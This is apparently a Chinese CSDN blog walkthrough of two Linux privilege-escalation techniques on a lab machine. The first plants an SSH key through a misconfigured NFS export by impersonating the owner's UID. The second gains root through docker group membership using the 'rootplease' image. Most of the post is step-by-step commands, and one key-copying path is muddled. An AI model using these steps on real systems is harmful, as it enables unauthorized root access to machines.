nsf挂载提权和docker提权

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量175 收藏
点赞数 1
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63963927/article/details/132762057
版权

nsf挂载提权

目标机器192.168.217.135开启2049 nfs端口

在攻击机kali安装nfs:

sudo apt-get install nfs-common

查看目标开放的文件夹

showmount -e 192.168.217.135

回显:/home/peter *  说明可挂载/home/peter的所有目录

首先在当前用户目录创建一个文件夹

mkdir /dijia 

将目标目录挂载到刚才创建的目录上

sudo mount 192.168.217.135:/home/peter  /dijia

到/home/peter/目录使用ls -a命令查看该目录下所有文件

尝试创建文件夹.ssh/ 发现没有权限

然后使用ls -l查看所有文件/目录的权限

发现目录所有者为1001 1005,由于挂载的目录为/home/peter 所以这里可知需要的用户为peter uid为1001  gid为1005

在本机创建一个peter用户并且uid为1001  gid为1005即可

创建组并指定组GID:

groupadd -g 1005 peter

创建用户并指定uid以及gid:

adduser peter -uid 1001 -gid 1005

创建完成后su到peter用户

接下来创建公私钥

ssh-keygen   生成公私钥对(注意当前用户,如果非peter用户需要去该用户的/home/用户名/.ssh/目录下查找公私钥)

在挂载的目录下创建.ssh文件夹

mkdir /dijia/.ssh/

将公钥复制到挂载的目录下

cat /dijia/.ssh/id_rsa.pub > /home/peter/.ssh/authorized_keys

然后赋值权限:

chmod 700 ../.ssh/

chmod 600 authorized_keys

注意:.ssh文件夹必须是700    公钥文件必须是600   才可以连接

ssh peter@192.168.217.135

拿到目标机权限

docker提权

Docker 运行的所有命令都是需要 sudo 来运行,那是因为 docker 需要 root 权限才能跑。

Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。

如果一个服务器有一个普通的用户,并且这个用户加入了 docker 组,则这个用户已经是 root 了,默认情况下,Docker 软件包是会默认添加一个 docker 用户组

cat /etc/group

此靶场Peter用户默认在docker组

创建用户并加入docker组:

adduser test-d

usermod -G docker test-d

newgrp docker

命令: id  查看当前用户组信息

提权(需要能够从外网拉镜像):

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

参数 -v 将容器外部的目录 / 挂载到容器内部 /hostOS

提权成功

拾 味
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
linux定时任务打包提权&docker提权
m0_62207170的博客
03-03 692
linux定时任务打包提权&docker提权
NSF未授权访问漏洞/共享文件目录数据信息泄露
weixin_38896449的博客
02-24 5850
NSF未授权访问漏洞1、漏洞描述2、漏洞检测3、漏洞利用/验证4、漏洞修复 1、漏洞描述 Network File System(NFS),网络文件系统,是由SUN公司研制的UNIX表示层协议(presentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。nfs最初只支持UDP协议,在新版本中支持TCP和UDP协议,默认监听端口为2049。 2、漏洞检测 (1)使用nmap,执行命令nmap --script nfs-showmount IP,获取到
linux~Docker容器提权
@小张小张的博客
11-06 4778
Docker容器的特点: 1.轻量级 在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。 2.标准 Docker容器基于开放标准,可在Linux发行版,Microsoft Windows以及任何基础架构(包括虚拟机,裸机)上运行。 3.安全 Docker容器将应用程序彼此隔离并从底层基础架构中分离出来。提供了最强大的默认隔离功能,可以将应用程序问题限制在一个容器中,而不是整个机器上。 关于docker提权
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
linux7.7 离线安装nfs客户端_Linux提权姿势二:利用NFS提权
weixin_39926311的博客
11-28 355
如果在服务器上具有低特权shell,并且发现服务器中具有NFS共享,则可以使用它来升级特权。但是成功取决于它的配置方式。目录1.什么是NFS?2.什么是root_sqaush和no_root_sqaush?3.所需的工具和程序文件。4.利用NFS弱权限。什么是NFS?网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程计算机上的文件,就像它们位于...
nfs-in-docker:Docker中的NFS版本3服务器和客户端
05-18
NSF挂载-将要服务的服务器端NFS卷的完整路径,如容器所示。 默\u8ba4='/nfs/share' 。 所有卷应该开始/nfs和分号( : )应各自路径定义之间使用。 客户 NFS_SERVER NFS服务器的FQDN或IP。 默认=server 。 NFS_...
linux 使用NSF 映射远程磁盘目录的实现
01-11
1、在两台机器上安装nsf 、 portmap yum install nfs-utils portmap 安装好了之后。 2、在192.168.1.1机器上面修改/etc/exports文件,加入如下内容 /data/ 192.168.1.2(rw,sync,no_root_squash)表示开放本机器...
hacmp 和NSF
05-23
假设服务器servera作为主服务器,当其宕机时,HACMP会启动服务器serverb,将sharedvg资源组的控制权转移过去,同时挂载并输出共享文件系统sharedfs。客户端会自动重新挂载sharedfs,确保服务不中断。 配置步骤如下...
nsf5_simulation_cste_payload_color_nsf5_
10-02
标题“nsf5_simulation_cste_payload_color_nsf5_”暗示了我们正在讨论与NSF5格式相关的模拟、颜色处理和秘密信息嵌入算法。在这个场景中,“NSF5”可能是一个特定的数据格式或者编码标准,用于存储或传输数据。描述...
NSF2250WT1的技术参数
12-10
NSF2250WT1是一款NPN型晶体管,广泛应用于各种电子设备中的开关、放大和驱动功能。以下是对该器件技术参数的详细解读: 首先,产品型号“NSF2250WT1”是该器件的唯一标识,便于在设计电路时选择合适的元器件。这种...
010106漏洞利用
TangTang_AM的博客
03-26 4651
6-1漏洞利用-FTP漏洞利用 1. FTP协议介绍 文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。 用户分类: 1、Real用户 2、Administrator 3、匿名用户 FTP文件传输格式 1、ASCII 2、二进制格式 2. 利用FTP匿名登录漏洞 由于FTP没有禁止匿名用户,所以可以直接使用Anonymous用户直接登录FTP服务器...
mysql提权方式linux_Linux提权的几种常用方式
weixin_32631729的博客
01-28 1922
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
docker提权
Longwaer
01-01 3437
通过靶场实验环境,更加深入了解docker提权原理及使用方法,提升个人对linux提权方法的掌握及运用。
Linux 提权的各种姿势总结
weixin_45116657的博客
11-21 5032
友情链接:Linux 提权的各种姿势总结 目录 提权方式总结 1、利用内核栈溢出提权 1.1> 信息收集 1.2> linux-exploit-suggester-2 2、明文 root 密码提权 3、密码复用 4、sudo 滥用 (1)su (2)awk (3)man (4)curl 5、su root 被禁止解决 6、计划任务 (1)重写pyth...
Linux玩转指南
qq_43535970的博客
07-25 843
Linux是一个类Unix操作系统,最初由Linus Torvalds于1991年发布。它是基于开源的内核,并结合了大量的开源软件,形成了完整的操作系统。Linux的设计理念强调开源和自由,使得它在全球范围内得到广泛应用,从个人电脑到服务器、嵌入式系统,甚至超级计算机。
linux】Shell脚本三剑客之grep和egrep命令的详细用法攻略
景天科技苑
07-25 4471
Linux和Unix系统中,grep(Global Regular Expression Print)是一个非常强大的文本搜索工具,能够根据用户指定的模式(由正则表达式和文本字符组合而成)对目标文件进行逐行搜索,并显示匹配到的行。而egrep(Extended Grep)则是`grep`的扩展版本,支持更多的正则表达式语法。尽管egrep在较新的系统中被`grep -E`选项所取代,但了解其用法对于理解和使用正则表达式仍然具有重要意义。
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 630
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux 常用命令分类及示例
简介
07-25 935
【代码】Linux 常用命令分类及示例。
linux nsf介绍
09-21
NSF具有以下特点和优势: . 透明性:对于客户端来说,远程文件系统的访问就像本地文件系统一样,无需关心底层的实现细节。 2. 共享性:多个客户端可以同时访问和共享同一个远程文件系统。 3. 跨平台:NSF支持在不同...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值